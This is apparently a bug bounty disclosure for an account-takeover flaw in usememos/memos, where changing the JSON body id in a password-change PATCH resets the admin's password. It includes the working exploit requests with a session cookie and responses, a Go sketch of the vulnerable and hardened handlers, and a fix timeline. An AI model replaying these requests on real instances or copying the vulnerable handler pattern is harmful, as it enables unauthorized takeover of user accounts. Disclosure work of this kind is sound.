Account takeover via changing password in usememos/memos

Valid

Reported on

Dec 19th 2022


Description

After logging in as a normal user, go to Settings and change the password. The client sends the following request (note that the user id appears both in the path and in the JSON body):

PATCH /api/user/104 HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MTQ3MjA1M3xEdi1EQkFFQ180UUFBUkFCRUFBQUhfLUVBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUE9fF-6AEnsMyuj8shTHmH9_q-nZgcVnIaW9EHKAC4Ncnrl
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 30
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"id":104,"password":"xthemo"}

The response to the password change is:

HTTP/2 200 OK
Date: Mon, 19 Dec 2022 17:48:17 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 269
Cf-Ray: 77c1f7d9bae011c1-MRS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
Server: cloudflare
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

{"data":{"id":104,"rowStatus":"NORMAL","createdTs":1671469980,"updatedTs":1671472096,"username":"test","role":"USER","email":"","nickname":"test","openId":"40edea21-d038-44ec-be61-c9699e925bb6","userSettingList":[{"UserID":104,"key":"appearance","value":"\"dark\""}]}}

If you change the "id" in the JSON body to 101 (the admin account) while still sending the same session cookie, the server changes that user's password instead. The path is left as /api/user/104; only the body id differs:

PATCH /api/user/104 HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MTQ3MjA1M3xEdi1EQkFFQ180UUFBUkFCRUFBQUhfLUVBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUE9fF-6AEnsMyuj8shTHmH9_q-nZgcVnIaW9EHKAC4Ncnrl
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 30
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"id":101,"password":"xthemo"}

The server accepts it and changes the password of user 101 (role HOST), as the following response shows:

HTTP/2 200 OK
Date: Mon, 19 Dec 2022 17:48:31 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 271
Cf-Ray: 77c1f8340edb11c1-MRS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
Server: cloudflare
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

{"data":{"id":101,"rowStatus":"NORMAL","createdTs":1671455650,"updatedTs":1671472111,"username":"demohero","role":"HOST","email":"demo@usememos.com","nickname":"Demo Hero","openId":"demo_open_id","userSettingList":[{"UserID":104,"key":"appearance","value":"\"dark\""}]}}
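The two exchanges above show where the flaw lies: the server picks the record to update from the "id" field of the JSON body, which the caller controls, rather than from the authenticated session (the path still says /api/user/104 while the body says 101, and it is user 101 that gets modified). The block below is an added example, not memos's own handler code: a self-contained Go net/http sketch that reproduces that flaw class beside a hardened version in which the target comes from the URL path, the body's "id" is ignored, and the caller must be that same user or a HOST. The in-memory Store, the X-Session-User header standing in for server-side resolution of the memos_session cookie, the stored passwords and the response shape are assumptions made so it runs offline; the user ids 101 and 104 and the USER/HOST roles are taken from the report.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strconv"
	"strings"
)

// User is a constructed in-memory record; ids and roles mirror the report ("HOST" is admin).
type User struct {
	ID       int
	Role     string
	Password string
}

// Store stands in for the database.
type Store struct{ Users map[int]*User }
func NewStore() *Store {
	return &Store{Users: map[int]*User{
		101: {ID: 101, Role: "HOST", Password: "admin-original"},
		104: {ID: 104, Role: "USER", Password: "user-original"},
	}}
}

// userPatch is the JSON body the client sends: {"id":104,"password":"..."}.
type userPatch struct {
	ID       int    `json:"id"`
	Password string `json:"password"`
}

// sessionUserID stands in for resolving the memos_session cookie server-side. Reading the
// id from an X-Session-User header is an assumption so the example runs offline; a real
// server must never take this id from the client.
func sessionUserID(r *http.Request) (int, bool) {
	id, err := strconv.Atoi(r.Header.Get("X-Session-User"))
	return id, err == nil
}

// VulnerableHandler reproduces the flaw class in the report: the record to update is the
// "id" from the body, which the caller controls, and nothing ties it to the session user.
func (s *Store) VulnerableHandler(w http.ResponseWriter, r *http.Request) {
	if _, ok := sessionUserID(r); !ok {
		http.Error(w, "unauthorized", http.StatusUnauthorized)
		return
	}
	var p userPatch
	if err := json.NewDecoder(r.Body).Decode(&p); err != nil || s.Users[p.ID] == nil {
		http.Error(w, "bad request", http.StatusBadRequest)
		return
	}
	s.Users[p.ID].Password = p.Password // attacker-chosen id
	fmt.Fprintf(w, `{"data":{"id":%d}}`, p.ID)
}

// HardenedHandler takes the target from the URL path, ignores the body's "id", and
// requires the caller to be that same user or a HOST.
func (s *Store) HardenedHandler(w http.ResponseWriter, r *http.Request) {
	callerID, ok := sessionUserID(r)
	caller := s.Users[callerID]
	if !ok || caller == nil {
		http.Error(w, "unauthorized", http.StatusUnauthorized)
		return
	}
	targetID, err := strconv.Atoi(strings.TrimPrefix(r.URL.Path, "/api/user/"))
	if err != nil {
		http.Error(w, "bad request", http.StatusBadRequest)
		return
	}
	if caller.ID != targetID && caller.Role != "HOST" {
		http.Error(w, "forbidden", http.StatusForbidden)
		return
	}
	var p userPatch
	target := s.Users[targetID]
	if err := json.NewDecoder(r.Body).Decode(&p); err != nil || target == nil {
		http.Error(w, "bad request", http.StatusBadRequest)
		return
	}
	target.Password = p.Password // p.ID is deliberately never consulted
	fmt.Fprintf(w, `{"data":{"id":%d}}`, target.ID)
}

// Patch sends one PATCH as the given session user and returns the HTTP status code.
func Patch(h http.HandlerFunc, sessionUser, path, body string) int {
	req := httptest.NewRequest(http.MethodPatch, path, strings.NewReader(body))
	req.Header.Set("X-Session-User", sessionUser)
	rec := httptest.NewRecorder()
	h(rec, req)
	return rec.Code
}

func main() {
	// Replay the report's second request (session of user 104, body id 101) against both.
	v, h := NewStore(), NewStore()
	Patch(v.VulnerableHandler, "104", "/api/user/104", `{"id":101,"password":"xthemo"}`)
	Patch(h.HardenedHandler, "104", "/api/user/104", `{"id":101,"password":"xthemo"}`)
	fmt.Printf("admin password: vulnerable=%q hardened=%q\n", v.Users[101].Password, h.Users[101].Password)
}
```

Against the vulnerable handler the replay overwrites user 101's password with "xthemo"; against the hardened one the same request only changes user 104's own password, a PATCH to /api/user/101 from user 104's session is refused with 403, and a HOST session may still reset another user. The ownership check is done on the path id before the record is even loaded, so the authorization decision never depends on anything the client put in the body.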

POC video

https://drive.google.com/file/d/1y2Czg9j4Qgc9mg5Ad3W8DY18ZoRyZkzd/view?usp=sharing

Impact

Takeover of any account, including the admin (HOST) account: any authenticated low-privilege user can set another user's password by supplying that user's id in the request body.

We are processing your report and will contact the usememos/memos team within 24 hours. 21 days ago
We have contacted a member of the usememos/memos team and are waiting to hear back 20 days ago
usememos/memos maintainer validated this vulnerability 20 days ago
Mohamed Abdelhady has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Mohamed
19 days ago

Researcher


Can you assign it a CVE?

STEVEN marked this as fixed in 0.9.0 with commit dca35b 17 days ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability 17 days ago